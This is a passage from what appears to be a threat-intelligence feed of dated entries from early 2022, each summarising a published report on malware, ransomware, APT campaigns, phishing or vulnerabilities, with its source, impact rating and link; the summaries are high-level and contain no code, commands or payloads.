- Researchers at Qihoo 360’s Netlab captured an ELF file on their honeypot system which was first observed propagating through the Log4j vulnerability on February 9, 2022. After closely analysing the file, they named it B1txor20 based on its propagation using the file name ‘b1t’, the XOR encryption algorithm and the RC4 algorithm key length of 20 bytes.
Source:
https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/
—
- Intel Source:
- Securonix
- Intel Name:
- EnemyBot – Linux based Botnet
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- Securonix Threat Labs has identified a Linux-based botnet dubbed EnemyBot. STL correlates EnemyBot to the LolFMe botnet, which contains similar strings such as “watudoinglookingatdis”. The EnemyBot malware also has the ability to steal data via HTTP POST; in their analysis, STL identified the malware sending the data back to the original IP address.
Source:
https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/
—
- Intel Source:
- CISA
- Intel Name:
- Russian Threat Actors exploits PrintNightMare Vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- In a joint advisory by the FBI and CISA, organizations are warned that Russian state-sponsored threat actors have gained network access through exploitation of default MFA protocols and a known vulnerability. The advisory also provides TTPs, IOCs and recommendations to protect against Russian state-sponsored malicious cyber activity.
—
- Intel Source:
- STR
- Intel Name:
- CaddyWiper TTP_Seeder_Queries_15/03/222
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- ESET
- Intel Name:
- CaddyWiper Malware
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- ESET researchers have identified a third wiper malware impacting Ukraine, dubbed CaddyWiper. This wiper has a relatively small compiled size of just 9KB compared with previous wiper attacks. This is a developing threat; currently only one hash is available.
—
- Intel Source:
- Cyble
- Intel Name:
- Pandora Ransomware
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Cyble Research Labs has analysed a sample of Pandora ransomware. After analysing the sample, Cyble believes that Pandora ransomware is a rebrand of ROOK ransomware, as they observed similar behaviour in the past. The Pandora ransomware gang is suspected of leveraging the double extortion method.
Source:
https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/
—
- Intel Source:
- CERT-UA
- Intel Name:
- GrimPlant and GraphSteel used to attack Ukraine
- Date of Scan:
- 2022-03-15
- Impact:
- MEDIUM
- Summary:
- CERT-UA identified cyberattacks being launched by the UAC-0056 threat group targeting state authorities of Ukraine using phishing emails with instructions on improving information security that would deliver an executable leading to a Cobalt Strike beacon.
—
- Intel Source:
- SecureList
- Intel Name:
- Dirty Pipe vulnerability in Linux kernel
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- Security researcher Max Kellermann discovered a high-severity vulnerability in the Linux kernel which can be used for local privilege escalation. It affects Linux kernels from 5.8 through any version before 5.16.11, 5.15.25 and 5.10.102.
Source:
https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/
—
- Intel Source:
- STR
- Intel Name:
- North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Security Soup
- Intel Name:
- Decoding DanaBot malware
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- A researcher at Security Soup wrote about a VBS-based DanaBot downloader which has added an obfuscation scheme and a few other TTPs to its arsenal.
Source:
https://security-soup.net/decoding-a-danabot-downloader/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- NIGHT SPIDER Zloader Campaign
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike tracked an ongoing widespread intrusion campaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside legitimate software. This was used to execute NIGHT SPIDER’s Zloader trojan.
Source:
https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers analysed the malware/tool called ‘Liberator’ from the disBalancer group. Furthermore, the post has been updated with two new IoCs.
Source:
https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html
—
- Intel Source:
- Security Joes
- Intel Name:
- Sockbot in GoLand
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Security Joes incident response team responded to malicious activity in one of their clients’ network infrastructure. During the investigation it was discovered that the threat actors used two customized GoLang-compiled Windows executables “lsassDumper” and “Sockbot” to perform the attack.
Source:
https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Remcos RAT distribution campaign take advantage of Ukraine Invasion
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers have observed threat actors using email lure themes related to Russia-Ukraine conflict fundraising and humanitarian support. These emails are related to scam activity and deliver Remcos RAT.
Source:
https://blog.talosintelligence.com/2022/03/ukraine-invasion-scams-malware.html
—
- Intel Source:
- Blackberry
- Intel Name:
- CryptBot Infostealer disguised as Cracked Software
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry came across a new and improved version of the malicious infostealer CryptBot, which has been released via compromised pirated sites that appear to offer “cracked” versions of popular software and video games.
Source:
https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer
—
- Intel Source:
- Netskope
- Intel Name:
- Formbook/XLoader targets Ukraine Government Officials
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Netskope Threat Labs has analysed a phishing email targeting high-ranking government officials in Ukraine. The email seems to be part of a new spam campaign which contains an infected spreadsheet. The email also contains a .NET executable responsible for loading Formbook malware in a multi-stage chain.
—
- Intel Source:
- seguranca-informatica
- Intel Name:
- Brazilian trojan targets Portuguese users
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- A new variant of a Brazilian trojan has targeted users from Portugal, and there seems to be no difference in terms of sophistication in contrast to other well-known trojans such as Maxtrilha, URSA and Javali. The trojan has been disseminated via phishing templates impersonating tax services in Portugal.
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer Distributed via YouTube
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered an infostealer being distributed via YouTube. The threat actor disguised the malware as a game hack and uploaded a video on YouTube with a download link for the malware.
—
- Intel Source:
- Cylera
- Intel Name:
- Kwampirs Malware Linked to Shamoon APT
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cylera Labs assesses with medium to high confidence that Shamoon and Kwampirs are the same group or close collaborators, sharing updates, techniques and code over the course of multiple years. The evolution of Kwampirs and its connections with Shamoon 1 and 2 are also well documented in the recent report by Cylera.
—
- Intel Source:
- esentire
- Intel Name:
- TunnelVision exploits VMWare Horizon Servers
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from eSentire found suspicious account creation and credential harvesting attempts on a customer’s endpoint, and it was traced to a VMware Horizon server. The attack was linked with high confidence to TunnelVision, an Iranian-aligned threat actor.
Source:
https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor
—
- Intel Source:
- NovaSOC
- Intel Name:
- Russian Threat Actors using Google Ad Delivery Network
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from NovaSOC caught Russian actors utilizing the Google ad delivery network to establish browser connections. Russian IP addresses have been using the Google ad delivery network as a mechanism to initiate client network connections.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook malware targets Ukrainians
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Malwarebytes researchers recently discovered a malicious spam campaign dropping the Formbook stealer, specifically targeting Ukrainians. The email lures being sent are written in Ukrainian.
—
- Intel Source:
- Lab52
- Intel Name:
- LazyScripter APT H-Worm campaign
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Lab52 have tracked the activity of the LazyScripter APT and discovered new malware and new elements of infrastructure in the LazyScripter arsenal. Further analysing the LazyScripter malware, they found the use of a popular open-source online obfuscation tool for scripts, into which the group would inject their own downloader for njRAT.
—
- Intel Source:
- Sophos
- Intel Name:
- Email interjection by Qakbot
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Sophos Labs has discovered a new Qakbot botnet technique where the botnet spreads itself by inserting malicious replies into the middle of existing email conversations. These email interruptions take the form of a reply-all message that includes a short sentence and a link to download a zip file containing a malicious Office document.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater subgroup leveraging maldocs and RATs
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cisco Talos believes with high confidence that there are sub-groups operating under the MuddyWater umbrella targeting Turkey and Arabian Peninsula countries with maldocs and a Windows Script File-based RAT. These sub-groups are highly motivated to conduct espionage and intellectual property theft and to implant malware and ransomware in targeted networks.
Source:
https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Threat actors are attempting to exploit Ukrainian sympathizers by offering malware as cyber tools to target Russian entities. Cisco Talos analysed one such instance where a threat actor offered a DDoS tool on Telegram to target Russian websites. They downloaded the file and found it to be infostealer malware.
Source:
https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html
—
- Intel Source:
- Abnormal
- Intel Name:
- Online Contact forms delivering BazarLoader
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cybercriminals are always looking for new ways to target users. Researchers at Abnormal Security have identified attacks targeting users through online contact forms. They also observed that these attacks lead to the delivery of BazarLoader malware.
Source:
https://abnormalsecurity.com/blog/bazarloader-contact-form
—
- Intel Source:
- FBI FLASH
- Intel Name:
- Conti Ransomware Indicator of Compromise
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- A joint advisory has been released by the FBI, NSA and CISA detailing updated indicators of compromise for Conti ransomware and their TTPs. The ransomware has been very active and has included attack vectors like TrickBot and Cobalt Strike.
—
- Intel Source:
- Avast
- Intel Name:
- Prometheus Ransomware Decrypted
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Avast researchers have recently released a decryptor for the Prometheus ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Source:
https://decoded.avast.io/threatresearch/decrypted-prometheus-ransomware/
—
- Intel Source:
- Lumen
- Intel Name:
- Emotet Resurgence
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- The infamous malware ‘Emotet’, which returned in November 2021 after a 10-month gap, is once again showing signs of steady growth. Researchers at Lumen Black Lotus Labs have determined a strong resurgence of Emotet, with 130 000 unique bots spread across 179 countries since its return.
—
- Intel Source:
- Avast
- Intel Name:
- Raccoon Stealer leverages Telegram
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Researchers from Avast recently noted Raccoon Stealer, a password-stealing malware, using Telegram infrastructure to store and update its actual C&C addresses. Raccoon Stealer is being distributed via the downloaders Buer Loader and GCleaner.
Source:
https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/
—
- Intel Source:
- STR
- Intel Name:
- APT41_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Mandiant
- Intel Name:
- APT41 targeting US Government
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- Researchers at Mandiant state that they became aware of a campaign in May 2021 when they were called in to investigate an attack on a US government network. Analysis revealed that the attack had likely been carried out by the Chinese nation-state group APT41. Researchers have confirmed that the hackers compromised the networks of at least six U.S. state government organizations between May 2021 and February 2022.
Source:
https://www.mandiant.com/resources/apt41-us-state-governments
—
- Intel Source:
- Fortinet
- Intel Name:
- Agent Tesla RAT campaign
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- FortiGuard Labs analysed a phishing email impersonating a Ukraine-based materials and chemical manufacturing company sharing a purchase order. The phishing email has a PPT attachment that is part of a multi-stage effort to deploy the Agent Tesla RAT.
Source:
https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla
—
- Intel Source:
- Trend Micro
- Intel Name:
- Nokoyawa Ransomware linked to Hive
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers came across a new ransomware which had similarities with Hive ransomware, from their attack chain and the tools used to the order in which they execute various steps. Most of the ransomware’s targets are located in South America.
Source:
https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter New Espionage Campaign
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious zip file which contains a Microsoft Compiled HTML Help file named dovidka.chm. The malicious file, which displays the logos of the Ukrainian President’s office and secret services alongside content offering advice on dealing with the bombing, was designed to spread malware for espionage purposes against targets located in Ukraine.
—
- Intel Source:
- Trend Micro
- Intel Name:
- RURansom Wiper Targets Russia
- Date of Scan:
- 2022-03-09
- Impact:
- LOW
- Summary:
- Recently Trend Micro researchers analyzed a sample released by MalwareHunterTeam which, as per them, is a wiper disguised as ransomware, and it was targeting Russia. The malware is written in .NET and spreads as a worm.
Source:
https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html
—
- Intel Source:
- STR
- Intel Name:
- UNC1151_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Intel Name:
- Threat Landscape around Ukraine
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The Google Threat Analysis Group (TAG) has observed phishing campaigns and espionage activity from a range of threat actors, including FancyBear (APT28) and Ghostwriter, targeting Ukraine. Activity from Mustang Panda was also noted.
Source:
https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- PROPHET SPIDER Exploits Citrix ShareFile
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The CrowdStrike Intelligence team has investigated an incident where PROPHET SPIDER targeted Microsoft IIS by exploiting CVE-2021-22941. PROPHET SPIDER was first spotted in May 2017 and initially gains access to targeted networks by compromising vulnerable web servers.
Source:
https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/
—
- Intel Source:
- Fortinet
- Intel Name:
- Emotet recent campaign using MS Excel
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Fortinet researchers have conducted deep research on 500 Excel files which were involved in delivering the Emotet Trojan. Researchers analysed the Excel file leveraged to spread Emotet, the anti-analysis techniques used, persistence on the victim’s device, communication with C2 servers, and how modules are delivered, loaded and executed on the target system.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA416 targets European Government
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Researchers at Proofpoint have discovered the threat group TA416 targeting European diplomatic entities, including individuals involved in refugee and migrant services. The TA416 group is assessed to be aligned with the Chinese nation-state and exploits web vulnerabilities to profile its targets. Researchers identified that the campaign has escalated since the tensions between Russia, Ukraine and NATO members in Europe.
—
- Intel Source:
- ASEC
- Intel Name:
- Webhards distributing njRAT
- Date of Scan:
- 2022-03-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified njRAT malware being distributed through webhards. Webhards are a platform used to distribute malware, mainly by attackers targeting Korean users. The malware was disguised as an adult game uploaded to a webhard.
—
- Intel Source:
- FBI FLASH
- Intel Name:
- RagnarLocker Ransomware IoCs
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- Federal Bureau of Investigation (FBI) published a new FLASH report that provides additional IOCs associated with RagnarLocker ransomware. The FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware.
—
- Intel Source:
- Curated Intel
- Intel Name:
- Global credential harvesting campaign
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Curated Intelligence recently tracked a new global credential harvesting campaign targeting Microsoft accounts through a range of phishing emails masquerading as ‘shared document’ notifications which deliver an embedded URL that leads to a fake Adobe Document Cloud application login page.
Source:
https://www.curatedintel.org/2022/03/curated-intel-threat-report-adobe.html
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook targets Oil & Gas companies
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- During our random intel gathering we identified a tweet from Malwarebytes Threat Intelligence which states that FormBook continues to target Oil and Gas companies. It also has potential IoCs. A few hours later Malwarebytes published a blog with the findings. The campaign was delivered by a targeted email that contained two attachments: one a PDF file and the other an Excel document.
—
- Intel Source:
- Qualys
- Intel Name:
- AvosLocker group new variant targets Linux systems
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- The AvosLocker ransomware group made its first appearance in June 2021 targeting Windows machines. Recently, researchers at Qualys have identified that the AvosLocker group is also targeting Linux environments. The AvosLocker ransomware group advertises its latest ransomware variants on its dark web leak site and mentioned that they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines.
—
- Intel Source:
- Telsy
- Intel Name:
- Cyber campaign against Indian Government
- Date of Scan:
- 2022-03-07
- Impact:
- LOW
- Summary:
- Researchers from Telsy identified a spear phishing campaign targeting the Indian government. The threat actors are using legitimate portals as C2 with encrypted HTTPS communication; legitimate sites were used as Cobalt Strike C&C.
Source:
https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Multi malware campaign on Ukraine
- Date of Scan:
- 2022-03-04
- Impact:
- HIGH
- Summary:
- Trend Micro Research has verified and validated a number of alleged cyber attacks carried out by multiple groups in support of either Russia or Ukraine. Researchers analysed internal data and external reports to provide this information.
—
- Intel Source:
- Zscaler
- Intel Name:
- DanaBot attacks Ukrainian MOD
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- On 2 Mar 2022, in the midst of the Russia-Ukraine conflict, Zscaler identified a threat actor launching an HTTP-based DDoS attack against the Ukrainian Ministry of Defense’s webmail server. The attack uses DanaBot to launch the DDoS attack and deliver a second-stage malware payload using the download-and-execute command.
—
- Intel Source:
- Cofense
- Intel Name:
- Russia-Ukraine Conflict Leverages Phishing Themes
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- The Russia-Ukraine conflict on the ground and on the cyber front are going hand in hand. The Cofense Phishing Defense Center is monitoring phishing emails related to the conflict and has identified malicious campaigns that are using the conflict as a lure to target users and enterprises. However, Cofense does not have any evidence to support attribution of the phishing campaigns to the countries directly involved in the war.
Source:
https://cofense.com/blog/russia-ukraine-conflict-leverages-phishing-themes
—
- Intel Source:
- SecureWorks
- Intel Name:
- Domains Linked to Phishing Attacks Targeting Ukraine
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureWorks CTU have investigated a warning published by CERT-UA on 25 Feb 2022 regarding phishing attacks targeting Ukrainian military personnel and government. Researchers attributed this campaign to the MOONSCAPE threat group, whereas CERT-UA attributed it to the UNC1151 APT group linked to the Belarusian government.
Source:
https://www.secureworks.com/blog/domains-linked-to-phishing-attacks-targeting-ukraine
—
- Intel Source:
- AT&T
- Intel Name:
- BlackCat Ransomware- Technical Analysis
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- AT&T researchers recently analyzed BlackCat ransomware samples, which were quite active in Jan 2022. The key takeaways from their analysis were that the ransomware is coded in Rust and targets multiple platforms, Windows and Linux.
Source:
https://cybersecurity.att.com/blogs/labs-research/blackcat-ransomware
—
- Intel Source:
- Fortinet
- Intel Name:
- SoulSearcher Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have analyzed the evolution of the SoulSearcher malware, which has been targeting Windows, collecting sensitive information and executing additional malicious modules.
Source:
https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware
—
- Intel Source:
- Security Intelligence
- Intel Name:
- TrickBot upgrades AnchorDNS Backdoor
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM discovered an updated version of the Trickbot group’s AnchorDNS backdoor being used in recent attacks ending with the deployment of Conti ransomware. AnchorDNS is notable for communicating with its Command and Control (C2) server using the DNS protocol.
Source:
https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/
—
- Intel Source:
- ASEC
- Intel Name:
- Vollgar CoinMiner targets MSSQL
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC are monitoring a specific form of CoinMiner that has been consistently distributed to vulnerable MS-SQL servers. ASEC infrastructure has detected Vollgar CoinMiner samples in the logs. Vollgar is a typical CoinMiner that is installed via brute force attacks against MS-SQL servers with weak account credentials.
—
- Intel Source:
- Sophos
- Intel Name:
- Conti and Karma attacked Healthcare
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Sophos Labs researchers identified that two ransomware groups, Conti and Karma, exploited the ProxyShell vulnerability to gain access to the network of a healthcare provider in Canada, with very different tactics. The Karma group exfiltrated data but did not encrypt the targeted systems, while Conti came into the network later and encrypted the targeted systems.
—
- Intel Source:
- STR
- Intel Name:
- Conti Leaks_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Huntress
- Intel Name:
- BABYSHARK Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Huntress have identified APT group activity, attributed to North Korean threat actors, targeting national security institutes. The North Korean APT is using a malware family called BABYSHARK; this variant of the malware is customized to the specific victim environment.
Source:
https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood
—
- Intel Source:
- Barracuda
- Intel Name:
- DDoS botnets cryptominers exploits Log4shell
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Barracuda researchers have analyzed botnets and cryptominers exploiting Log4Shell vulnerabilities, and the activity has been constant for the past two months. They noticed that the majority of attacks came from IP addresses in the U.S., with half of those IP addresses being associated with AWS, Azure and other data centers.
Source:
https://blog.barracuda.com/2022/03/02/threat-spotlight-attacks-on-log4shell-vulnerabilities/
—
- Intel Source:
- Cyble
- Intel Name:
- Emotet Malware Updated TTPs
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Cyble researchers came across email phishing campaigns by the Emotet malware that were similar to earlier ones, using spam emails with malicious MS Excel files as the initial attack vector to infect targets. It was also observed that Emotet is rebuilding its botnet with the help of the TrickBot malware.
Source:
https://blog.cyble.com/2022/02/26/emotet-malware-back-in-action/
—
- Intel Source:
- Symantec
- Intel Name:
- Daxin Backdoor espionage campaign
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec found a new, highly sophisticated piece of malware being used by a Chinese threat actor; the backdoor is dubbed Daxin. Most of the targets have been government organizations of interest to China. The malware has also been called the most advanced type ever used by China-linked threat actors.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage
—
- Intel Source:
- STR
- Intel Name:
- RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA445 Targets European Governments
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- The Proofpoint Threat Research team has identified a likely nation-state sponsored phishing campaign using a possibly compromised Ukrainian armed service member’s email account to target European government personnel with a Lua-based malware dubbed SunSeed.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware being Redistributed
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have identified a redistribution campaign by the Magniber ransomware, which disguises itself as Windows update files. The distributed Magniber files use the normal Windows Installer (.msi) extension. Magniber is currently distributed using typosquatting techniques targeting Chrome and Edge users on the latest Windows version.
—
- Intel Source:
- Cofense
- Intel Name:
- QakBot Campaign with old Tactics
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- The Cofense Phishing Defense Center has analysed emails delivering Qakbot that revive a familiar tactic seen in older emails.
Source:
https://cofense.com/blog/qakbot-campaign-attempts-to-revive-old-emails
—
- Intel Source:
- Palo Alto
- Intel Name:
- Spear Phishing attacks on Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto identified a spear phishing campaign attributed to UAC-0056. The targeted organizations were in Ukraine, and the payloads included the document stealer OutSteel and the downloader SaintBot.
Source:
https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/
—
- Intel Source:
- ASEC
- Intel Name:
- ColdStealer Infostealer
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have analysed a new infostealer dubbed ColdStealer, which disguises itself as a software download for cracks and tools. Two distribution methods are used: either a single malware such as CryptBot or RedLine is delivered directly, or dropper-type malware is used.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Electron Bot – SEO poisoning malware
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point Research have identified a new malware dubbed Electron Bot, which has infected over 5,000 active machines worldwide and is distributed through Microsoft's official store. Electron Bot is a modular SEO poisoning malware used for social media promotion and click fraud. Once the malware persists on the targeted system, it executes attacker commands such as controlling social media accounts on Facebook, Google and SoundCloud.
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC3313 targets MiddleEast government
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers recently responded to an intrusion by UNC3313, which was targeting a Middle East government; new targeted malware, Gramdoor and Starwhale, was also used. The whole process started with a targeted spear phishing email.
Source:
https://www.mandiant.com/resources/telegram-malware-iranian-espionage
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- New wiper and worm targets Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- HIGH
- Summary:
- ESET researchers discovered a new set of malware, including a worm, after Russia's invasion of Ukraine. The malware was dubbed IsaacWiper and HermeticWizard, alongside a decoy ransomware called HermeticRansom, aka PartyTicket.
Source:
https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
—
- Intel Source:
- SentinelOne
- Intel Name:
- Evolution of EvilCorp
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelLabs have assessed with high confidence that WastedLocker, Hades, Phoenix Locker and PayloadBIN belong to the same cluster of malware operated by Evil Corp. A technical analysis was also done on the evolution of Evil Corp from Dridex through to Macaw Locker, and the report for the first time publicly describes CryptOne and the role it plays in Evil Corp malware development.
Source:
https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp
—
- Intel Source:
- Palo Alto
- Intel Name:
- SockDetour Targets U.S. Defense Contractors
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto came across a stealthy custom malware, SockDetour, that targeted U.S.-based defense contractors. Analysis shows that SockDetour was delivered from an external FTP server to a U.S.-based defense contractor's internet-facing Windows server.
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC2596 deploys Cuba ransomware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers track a ransomware gang as UNC2596, which deploys the COLDDRAW ransomware, commonly known as Cuba ransomware. The group has been found exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. The Cuba operation primarily targets the United States, followed by Canada.
Source:
https://www.mandiant.com/resources/unc2596-cuba-ransomware
—
- Intel Source:
- Intel471
- Intel Name:
- TrickBot Switches to New Malware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- As per a recent report by Intel 471, TrickBot is switching its operations and joining hands with the Emotet operators. It has also been noticed that the Bazar malware family was recently linked to TrickBot, as its operators were taking over the TrickBot operations.
Source:
https://intel471.com/blog/trickbot-2022-emotet-bazar-loader
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_Seeder Queries_25/02/2022
- Date of Scan:
- 2022-02-28
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- netlab360
- Intel Name:
- DDoS attacks against Ukrainian Websites
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- NetLab360 researchers analyzed the recent DDoS attacks on Ukrainian websites and tracked the botnets involved. As per them, the C2s belong to multiple malware families, including Mirai, Gafgyt, ripprbot, moobot and ircBot.
—
- Intel Source:
- FBI/NCSC/CISA
- Intel Name:
- Muddywater attacks U.S/Worldwide
- Date of Scan:
- 2022-02-25
- Impact:
- HIGH
- Summary:
